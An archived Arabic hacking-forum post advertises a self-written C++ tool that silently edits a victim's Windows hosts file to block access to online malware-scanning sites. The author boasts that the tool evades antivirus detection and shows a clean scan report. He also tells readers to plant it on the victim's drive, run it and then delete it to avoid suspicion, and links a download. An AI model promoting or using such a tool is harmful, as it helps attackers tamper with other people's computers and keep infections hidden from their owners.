development-point

development-point (https://vb.development-point.com/index.php)
-   الأرشيف (https://vb.development-point.com/forumdisplay.php?f=80)
-   -   [ حل ] ₪|~|حــــــــــــــريا₪ أغلق على الضحية مواقع الفحص نهائيا بضغطة زر ₪|~| ++c₪|~|كليييييييين. (https://vb.development-point.com/showthread.php?t=3032)

‏windows 8 11-08-2012 05:30 AM

[ حل ] ₪|~|حــــــــــــــريا₪ أغلق على الضحية مواقع الفحص نهائيا بضغطة زر ₪|~| ++c₪|~|كليييييييين.
 
http://up.arab-x.com/Mar10/iTS30053.png
الصلاة والسلامعلىأشرف المرسليـن...

الحمدللهوحدهنحمدهو نشڪُره و نستعينهو نستغفرهو نعودباللهمنشرورأنفسناومنسيئاتأعمالنا ...

...منيهدهاللهفلامظللهو منيظللفلنتجدلهولياًمرشدا...

...و أشهدألا إلاه إلا اللهوحدهلا شريكلهوأنمحمداًعبدهو رسولهصلى اللهعليهو سلم

أخوتي اليوم قمت ببرمجة برنامج جميل يقوم بغلق
جميع مواقع الفحص عن الضحية وذلك بضغة زر واحدة ^^

http://up.arab-x.com/Mar10/iTS30053.png

الأدات مصممة بلغة البرمجة ++C

الادات في الواقع برمجتها من فكرة الاخ العزيز Alex في موضوعه :

[ حل ] AlexBlock v1 الضمار الشامل :::::سيطرة مطلقة على الجهاز :::: باي باي جميع مواقع الفحص
و ...........

http://up.arab-x.com/Mar10/iTS30053.png
مشاء الله برنامجه ايضا رائع ولكن برنامجي انا ايضا معى كل احترامتي لصاحب الفكرة الاصلي Alex برنامجي يختصر عمل برنامجه كامل في ضغطة زر
http://up.arab-x.com/Mar10/iTS30053.png
طيب سأشرح لماذا لانه هوا عليه ان يضع برنامجه ليشتغل معى بداية الكومبيوتر
وذلك لصد الضحية كل مرة اراد فيها الدخول الى الموقع .
وذلك أدى الى كشف أداته وأصبحت تحتسب ادات تخريبية لدى برامج الحماية
+
قد يككتشف الضحية البرنامج ويوقف عمله من بداية التشغيل بسيطة
Msconfig
http://up.arab-x.com/Mar10/iTS30053.png

أما اداتي فهيا جميلة من حيث الخصائص التالية :


1- امكانية أضافة اي موقع فحص جديد ليس موجود في القائمة .

2- لغة البرمجة قوية جدا سي ++


3- مشفرة 100%100 ولا تنكشف لانها لا تحتوي على اي دوال Api
او اي فعل او تغيير بالنضام تلقائيا
.

4- تعمل في الخفاء التام اي تشتغل مرة واحدة في جهاز الضحية في الوضع الصامت
تم يمكنك حدفها بعدها .^^

5- كلما أراد الضحية ان يدخل احد مواقع الفحص تأتيه صفحة كهده :
http://up.arab-x.com/Mar10/iTS30053.png
مثلا من متصفح E هده الصورة :
http://www.404errorpages.com/images/image003.png
http://up.arab-x.com/Mar10/iTS30053.png
تقوم الادات ببعث باسماء المواقع الى الملف Host الخاص بالويندوز
وهوا الملف المختص بغلق بعض المواقع وأداتي تتعامل معه .
اي مجرد متفتح الادات في جهاز الضحية تقوم بارسال الايبيهات الى الملف
تم ينتهي عملها :29:
اي ان اردت حدفها بعد ذلك فأحدف
http://up.arab-x.com/Mar10/iTS30053.png
الان الى عمل الأدات :

أولا عليك تحميل الادات + ملف txt سرقته من موضوع الاخ
Alex مع كل أحتراماتي له :28:
فيه كل مواقع الفحص الاساسية ماعليك أنت سوى
ان تضعها في القص C لدى الضحية وتضغط على أداتي مرتين ومن تم أحدف الادات والملف من جهاز الضحية لتجنب الشك :29:

http://up.arab-x.com/Mar10/iTS30053.png
نتيجة فحص الأدات :

File information
Report date:2012-11-08 02:37:30 (GMT 1) File name:mii3a-blocker-exe File size:938465 bytes MD5 hash:80fd629543ba6a9e5f539206e646c5a1 SHA1 hash:1613f83b089fe48b8e0c01a4bdb8035826752065 Detection rate: 0 on 14 (0%) Status:CLEAN
[DOWNLOAD]http://vscan.novirusthanks.org/analy...vY2tlci1leGU=/[/DOWNLOAD]

http://up.arab-x.com/Mar10/iTS30053.png
الان نأتي الى تحميل الأدات + الملف :
حجم الأدات + ملف التكست خفييييف جداا :

[NEW]http://rghost.net/41420412[/NEW]

http://up.arab-x.com/Mar10/iTS30053.png
الى هنا نصل الى نهاية الموضوع أرجو ان افيد ولو بالقليل
في أمان الله ودمتم في حفض الله .

http://up.arab-x.com/Mar10/iTS30053.png



الساعة الآن 04:48 PM

Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47